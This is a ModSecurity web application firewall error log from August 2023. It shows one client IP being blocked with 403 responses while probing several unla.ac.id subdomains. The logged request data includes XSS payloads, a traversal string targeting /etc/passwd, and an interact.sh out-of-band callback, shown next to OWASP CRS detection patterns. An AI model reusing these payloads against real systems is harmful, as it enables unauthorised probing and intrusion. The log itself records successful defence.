[Tue Aug 29 11:55:40.848024 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:svpnlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within REQUEST_COOKIES:svpnlang: <script>alert('document.domain')</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wnm/login/login.json"] [unique_id "ZO16TMCo-f0AAAolKuMAAAAe"]
[Tue Aug 29 11:55:41.812261 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:link_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:link_url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/Ajax_url_encode.php"] [unique_id "ZO16TcCo-f0AAAolKukAAAAe"]
[Tue Aug 29 11:55:41.813188 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:link_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:link_url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/Ajax_url_encode.php"] [unique_id "ZO16TcCo-f0AAAoz8KEAAAAS"]
[Tue Aug 29 11:55:41.815357 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:link_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:link_url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/Ajax_url_encode.php"] [unique_id "ZO16TcCo-f0AAAqY6GgAAAAr"]
[Tue Aug 29 11:55:41.920897 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:link_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:link_url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/Ajax_url_encode.php"] [unique_id "ZO16TcCo-f0AAAq5@EEAAAAK"]
[Tue Aug 29 11:55:41.967287 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:link_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:link_url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Ajax_url_encode.php"] [unique_id "ZO16TcCo-f0AAAq5@EMAAAAK"]
[Tue Aug 29 11:55:42.736976 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:link_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:link_url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/Ajax_url_encode.php"] [unique_id "ZO16TsCo-f0AAAqeFZsAAAAx"]
[Tue Aug 29 11:55:43.717129 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:port. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:port: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/fw/syslogViewer.do"] [unique_id "ZO16T8Co-f0AAAqqtiIAAAAA"]
[Tue Aug 29 11:55:43.862128 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:port. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:port: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/fw/syslogViewer.do"] [unique_id "ZO16T8Co-f0AAAqqtiQAAAAA"]
[Tue Aug 29 11:55:43.864517 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:port. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:port: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/fw/syslogViewer.do"] [unique_id "ZO16T8Co-f0AAAqY6HMAAAAr"]
[Tue Aug 29 11:55:43.866340 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:port. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:port: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/fw/syslogViewer.do"] [unique_id "ZO16T8Co-f0AAAqeFZ8AAAAx"]
[Tue Aug 29 11:55:43.868823 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:port. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:port: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/fw/syslogViewer.do"] [unique_id "ZO16T8Co-f0AAApbUncAAAAh"]
[Tue Aug 29 11:55:43.929689 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(1337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/sell-media-search/"] [unique_id "ZO16T8Co-f0AAAqqtiYAAAAA"]
[Tue Aug 29 11:55:43.979757 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(1337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/sell-media-search/"] [unique_id "ZO16T8Co-f0AAAqeFaIAAAAx"]
[Tue Aug 29 11:55:43.980094 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(1337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/sell-media-search/"] [unique_id "ZO16T8Co-f0AAApbUnkAAAAh"]
[Tue Aug 29 11:55:44.014412 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(1337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/sell-media-search/"] [unique_id "ZO16UMCo-f0AAAqqtikAAAAA"]
[Tue Aug 29 11:55:44.041148 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(1337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/sell-media-search/"] [unique_id "ZO16UMCo-f0AAAqSwzEAAAAN"]
[Tue Aug 29 11:55:44.532563 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:cid: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/component/music/album.html"] [unique_id "ZO16UMCo-f0AAAqqtioAAAAA"]
[Tue Aug 29 11:55:44.546694 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:cid: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/component/music/album.html"] [unique_id "ZO16UMCo-f0AAAqY6HgAAAAr"]
[Tue Aug 29 11:55:44.547025 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:cid: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/component/music/album.html"] [unique_id "ZO16UMCo-f0AAAqSwzIAAAAN"]
[Tue Aug 29 11:55:44.552206 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:cid: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/component/music/album.html"] [unique_id "ZO16UMCo-f0AAAqqtisAAAAA"]
[Tue Aug 29 11:55:44.565059 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:cid: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/component/music/album.html"] [unique_id "ZO16UMCo-f0AAAq@sX0AAAAM"]
[Tue Aug 29 11:55:44.580454 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nodatamsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nodatamsg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html"] [unique_id "ZO16UMCo-f0AAAqqtiwAAAAA"]
[Tue Aug 29 11:55:44.603560 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nodatamsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nodatamsg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html"] [unique_id "ZO16UMCo-f0AAAqeFacAAAAx"]
[Tue Aug 29 11:55:44.604977 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nodatamsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nodatamsg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html"] [unique_id "ZO16UMCo-f0AAAqSwzQAAAAN"]
[Tue Aug 29 11:55:44.629449 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16UMCo-f0AAAolKvwAAAAe"]
[Tue Aug 29 11:55:44.648259 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nodatamsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nodatamsg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html"] [unique_id "ZO16UMCo-f0AAAqY6HwAAAAr"]
